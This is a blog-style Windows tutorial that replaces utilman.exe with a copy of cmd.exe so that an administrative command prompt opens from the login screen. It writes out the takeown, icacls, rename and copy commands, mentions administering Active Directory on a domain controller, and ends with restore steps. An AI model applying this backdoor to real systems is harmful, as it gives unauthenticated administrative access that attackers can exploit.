On every windows system there is a small but useful feature called Ease of access. If you want a high-contrast theme, optimized visual display or closed captions, then “Ease of access” is your friend. You can start it without logging in. This article describes how to use utilman.exe to create a backdoor to your System. At the end of the article we will restore the default settings.
What´s in this article?
If you want to configure your system to look like this, then continue reading … Pay attention to the background. I am not logged in and can run cmd with administrative rights … This works on Windows 10 and Windows Server …
The file with which you can start Ease of Access is called utilman.exe. You can find it in C:\Windows\System32. But now we come across a problem. We have to modify the file, because it´s restricted to system accounts only. So, we have to take ownership and grant full access to the administator account. Open Windows PowerShell with administrative rights. Pay attention to the grant parameter in the second command. You have to provide your username there. If necessary, replace administrator with the name of your user account, which must be a member of the local administrators group.
takeown /f $env:windir\system32\utilman.exe icacls $env:windir\system32\utilman.exe /grant "$($env:username):F"
Now we rename it to utilman2.exe. Then we copy cmd and call it utilman.exe 😉
Rename-Item $env:windir\system32\utilman.exe $env:windir\system32\utilman2.exe Copy-Item $env:windir\system32\cmd.exe $env:windir\system32\utilman.exe
What has happend now? We now have a new file called utilman.exe. But this file will not run Ease of Access. It will run cmd.
Testing the configuration
Now log off. Click on the icon in the lower right corner. This is Ease of Success.
But now it´s cmd. You are able to configure your system without logging in.
If you do this on a Domain Controller, feel free to start PowerShell and run Get-ADUser. 😉 Note: An attacker can now administer your Active Directory Domain.
Or open dsa.msc to administer Active Directory.
You should undo the changes you have made. Delete c:\windows\system32\utilman.exe (which currently opens cmd) and rename c:\windows\system32\utilman2.exe to utilman.exe to restore the default settings.
Is the possibility to rename utilman and change it to cmd a security issue? The answer is not easy. Utilman.exe is a protected file. You have to take ownership to go for it. What do you think?